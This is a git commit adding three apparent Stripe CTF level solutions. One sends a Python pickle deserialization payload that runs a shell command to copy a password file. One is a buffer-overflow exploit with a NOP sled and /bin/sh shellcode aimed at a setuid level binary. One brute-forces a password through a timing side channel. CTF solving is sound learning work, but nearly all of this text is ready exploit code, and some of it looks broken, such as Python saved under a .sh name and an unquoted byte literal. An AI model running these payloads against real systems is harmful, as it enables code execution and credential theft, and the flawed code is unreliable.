stripe ctf 1 scripts

2025-04-27 11:09:09 -04:00 · 2014-11-29 22:16:26 -05:00 · 2014-11-29 22:16:26 -05:00 · 37cb7d0d10
commit 37cb7d0d10
parent 47d32d7854
3 changed files with 25 additions and 0 deletions
--- a/CTFs_and_WarGames/STRIPE_1-2-3/1/pickle_attack.sh
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/pickle_attack.sh
@ -0,0 +1,6 @@
+import pickle, os
+HOST = 'localhost:9020'
+
+os.execve("/usr/bin/curl", ['', HOST, '-d', \
+    "bla; job: cos\nsystem\n(S'cat /home/level05/.password \
+    > /tmp/pass'\ntR."], {})
--- a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode.py
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode.py
@ -0,0 +1,12 @@
+import struct, subprocess
+
+STACK = 0x0804857b
+NOP = \x90
+SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+EXPLOIT = NOP * (1024 - len(SHELLCODE)) + SHELLCODE
+
+stack_ptr = struct.pack("<I", STACK) * 500
+array = "%s%s" % (EXPLOIT, stack_ptr)
+
+while 1:
+  subprocess.call(["/levels/level04", array])
--- a/CTFs_and_WarGames/STRIPE_1-2-3/1/timming_attack.sh
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/timming_attack.sh
@ -0,0 +1,7 @@
+#!/bin/bash
+
+for c in {A..Z} {a..z} {0..9}; do
+echo $c
+head -c35 file & sleep 0.1
+/levels/level06 /home/the-flag/.password "$c"A 2> file
+done